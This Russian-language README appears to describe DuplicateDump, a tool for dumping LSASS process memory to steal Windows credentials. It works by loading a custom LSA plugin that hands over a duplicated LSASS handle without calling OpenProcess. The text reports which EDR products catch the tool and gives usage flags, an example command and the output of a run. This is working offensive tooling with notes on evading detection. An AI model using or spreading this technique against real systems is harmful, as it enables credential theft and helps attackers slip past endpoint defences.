
Дамп LSASS с дублированным дескриптором из кастомного плагина LSA
DuplicateDump — это форк MirrorDump со следующими изменениями:
DuplicateDump добавляет пользовательский LSA-плагин, который дублирует дескриптор процесса LSASS из процесса LSASS в DuplicateDump. Таким образом, DuplicateDump получает готовый к использованию дескриптор процесса LSASS без вызова OpenProcess.
При загрузке DuplicateDump в память удалось сдампить память LSASS без обнаружения на
Обнаруживается Cortex XDR, Crowdstrike. Не удалось сдампить lsass без обнаружения на SentinelOne.
Скомпилируйте LSA-плагин (экспортируйте функцию SpLsaModeInitialize или dllMain) и укажите полный путь к DLL для DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this help
Пример
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
DuplicateDump использует DInvoke для вызова API AddSecurityPackage для загрузки LSA-плагина. Вы можете использовать RPC-вызов, не вызывая напрямую этот API. Подробнее в блог-посте XPN
Недавно splinter_code обнаружил, что SecLogon можно использовать для дампа LSASS. Настоятельно рекомендую изучить его блог-пост.